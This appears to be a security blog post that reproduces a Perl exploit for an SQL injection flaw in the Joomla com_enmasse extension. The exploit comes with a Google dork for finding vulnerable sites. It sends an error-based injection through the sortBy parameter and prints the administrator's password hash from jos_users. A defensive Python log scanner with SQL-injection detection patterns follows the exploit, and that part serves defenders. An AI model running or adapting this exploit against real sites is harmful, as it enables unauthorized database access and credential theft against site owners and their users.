Joomla com_enmasse SQL Injection Vulnerability

An SQL injection vulnerability has been found in the Joomla com_enmasse extension. As is well known, SQL injection vulnerabilities had already been found in a very large share of Joomla's extensions. As this case shows, SQL injection vulnerabilities are still being found in extensions. The SQL injection and the Perl exploit follow. It needs to be fixed as soon as possible.

____________________________________________________________

#!/usr/bin/perl -w

 

########################################

# Exploit Title: Joomla com_enmasse Remote Exploit

#

# Dork: inurl:index.php?option=com_enmasse

#

# Date: [06-08-2012]

#

# Author: Daniel Barragan “D4NB4R”

#

# Twitter: @D4NB4R

#

# site: http://poisonsecurity.wordpress.com/

#

# Vendor: http://www.matamko.com/

#

# Version: 1.2.0.4 (last update on Jul 27, 2012)

#

# License: Enmasse 6 Months Support & Subscription –  USD$358.20

#

# Demo: http://www.matamko.com/products/filexpress/live-demo.html

#

# Tested on: [Linux(bt5)-Windows(7ultimate)]

#

# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc….

########################################

 

print “\t\t\n\n”;

print “\t\n”;

print “\t            Daniel Barragan  D4NB4R                \n”;

print “\t                                                   \n”;

print “\t        Joomla com_enmasse Remote Exploit \n”;

print “\t\n\n”;

 

use LWP::UserAgent;

print “\nIngrese el Sitio:[http://wwww.site.com/path/]: “;

 

chomp(my $target=<STDIN>);

 

$concatene=”concat(password)”;

$table=”jos_users”;

$d4nb4r=”floor”;

$com=”com_enmasse”;

$seleccione=”select”;

 

 

$b = LWP::UserAgent->new() or die “Could not initialize browser\n”;

$b->agent(‘Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’);

 

$host = $target . “index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=”.$com.”&sortBy=117 and(“.$seleccione.” 1 from(“.$seleccione.” count(*),concat((“.$seleccione.” (“.$seleccione.” (“.$seleccione.” “.$concatene.” from “.$table.” Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C”.$d4nb4r.”(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1″;

 

$res = $b->request(HTTP::Request->new(GET=>$host));

$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/)  {

 

print “\n Hash Admin : $1\n\n”;

print ” El exploit fue exitoso si desea ver mas datos modifique el script\n”;

print ” The exploit was successful if you want to see more data modify the script\n”;

 

}

else{print “\n[-] No se pudo, intente manualmente\n”;}

 

#####Daniel Barragan D4NB4R 2012################
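For defenders, the request built by the script above carries its SQL in the `sortBy` parameter of an `option=com_enmasse` URL, which is easy to spot in web server access logs. The following is an added example, not part of the original post or the exploit author's code: it assumes a combined-format access log and that a legitimate `sortBy` value is a short plain token, and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption (not taken from the component's source): a legitimate sortBy
# value is a short plain token such as "117".
SAFE_SORT = re.compile(r"[A-Za-z0-9_]{1,32}")
# SQL fragments visible in the request shown on this page.
SQL_MARKERS = re.compile(
    r"information_schema|\bselect\b|\bconcat\s*\(|\bfloor\s*\(\s*rand|\bgroup\s+by\b",
    re.I)
# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (.+?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, shortened query).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Aug/2012:10:00:01 +0000] "GET /index.php?option=com_enmasse'
    '&controller=deal&categoryId=1&sortBy=117 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Aug/2012:10:00:09 +0000] "GET /index.php?categoryId=1'
    '&controller=deal&keyword=1&locationId=1&option=com_enmasse'
    '&sortBy=117%20and(select%201%20from%20information_schema.tables%20group%20by%20x)'
    ' HTTP/1.1" 200 734',
    '203.0.113.5 - - [06/Aug/2012:10:00:15 +0000] "GET /index.php?option=com_content'
    '&view=article&id=4 HTTP/1.1" 200 8841',
]

def inspect_line(line):
    """Return (client, sortBy value, markers) for a suspicious com_enmasse request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qs percent-decodes once, so %20 and %2C are seen as space and comma.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_enmasse" not in params.get("option", []):
        return None
    for value in params.get("sortBy", []):
        markers = sorted({hit.lower() for hit in SQL_MARKERS.findall(value)})
        if markers or not SAFE_SORT.fullmatch(value):
            return client, value, markers
    return None

def scan(lines):
    """Return findings for every suspicious line in an iterable of log lines."""
    return [hit for hit in map(inspect_line, lines) if hit]

if __name__ == "__main__":
    for client, value, markers in scan(SAMPLE_LOG):
        print(f"{client}: sortBy={value!r} markers={markers}")
```

The same allow-list idea applies on the server side: a sort parameter that is validated against a fixed set of expected values before it reaches the query cannot carry SQL.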
